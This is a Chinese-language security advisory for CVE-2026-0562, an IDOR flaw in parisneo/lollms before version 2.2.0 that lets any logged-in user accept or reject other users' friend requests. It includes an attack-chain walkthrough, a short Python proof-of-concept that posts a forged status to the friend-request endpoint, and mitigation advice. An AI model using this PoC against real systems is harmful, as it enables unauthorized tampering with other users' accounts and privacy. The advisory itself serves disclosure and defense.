IPBUF安全漏洞报告
English
CVE-2026-0562 CVSS 8.3 高危

CVE-2026-0562 lollms越权漏洞

披露日期: 2026-03-29

漏洞信息

漏洞编号
CVE-2026-0562
漏洞类型
不安全的直接对象引用 (IDOR)
CVSS评分
8.3 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
parisneo/lollms

相关标签

IDOR越权漏洞权限绕过lollmsCVE-2026-0562

漏洞概述

parisneo/lollms 2.2.0之前版本存在严重安全漏洞。由于`backend/routers/friends.py`文件中`respond_request()`函数缺乏适当的授权检查,导致出现不安全的直接对象引用(IDOR)问题。攻击者利用该漏洞,只需经过身份验证即可通过`/api/friends/requests/{friendship_id}`端点,接受或拒绝属于其他用户的好友请求。此行为可导致未授权访问、隐私泄露及潜在的社会工程攻击风险。

技术细节

该漏洞的核心在于不安全的直接对象引用(IDOR)。在受影响的lollms版本中,处理好友请求的API端点`/api/friends/requests/{friendship_id}`在业务逻辑上存在严重缺陷。虽然系统要求用户进行身份认证(PR:L),但在执行`respond_request()`函数时,服务器仅检查了用户是否已登录,而未严格验证当前发起请求的用户ID是否与数据库中该`friendship_id`对应的接收者ID一致。这意味着,攻击者只需拥有一个普通账号,即可通过遍历、猜测或窃取他人的`friendship_id`,构造恶意HTTP请求(如POST请求)直接调用该接口。攻击者可以随意接受或拒绝他人的好友申请,导致用户关系混乱,进而引发隐私泄露或进行社会工程学攻击,严重威胁系统的完整性与机密性。

攻击链分析

STEP 1
1. 获取凭证
攻击者在目标平台注册账号或使用已有账号进行登录,获取合法的会话凭证(Session/Token)。
STEP 2
2. 识别端点
攻击者分析前端或API文档,发现用于处理好友请求的端点 `/api/friends/requests/{friendship_id}`。
STEP 3
3. 构造Payload
攻击者猜测或获取属于其他用户的 `friendship_id`,并构造包含接受或拒绝操作的POST请求数据包。
STEP 4
4. 发起攻击
攻击者使用自己的身份凭证向目标端点发送请求,由于缺乏校验,服务器执行了操作,导致受害者的好友状态被篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target API endpoint url = "http://target.com/api/friends/requests/{friendship_id}" # Attacker's authenticated headers headers = { "Authorization": "Bearer <attacker_jwt_token>", "Content-Type": "application/json" } # The ID of a friend request belonging to another victim victim_request_id = 12345 # Payload to accept or reject the request payload = { "status": "accepted" # or "rejected" } # Send the malicious request response = requests.post(url.format(friendship_id=victim_request_id), json=payload, headers=headers) if response.status_code == 200: print("[+] Successfully manipulated the friend request.") else: print("[-] Failed to exploit the vulnerability.")

影响范围

parisneo/lollms < 2.2.0

防御指南

临时缓解措施
建议立即升级到修复版本。若无法立即升级,应在WAF层对该API端点实施严格的访问控制,限制请求频率,并临时禁用好友请求功能,直至补丁应用完成。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表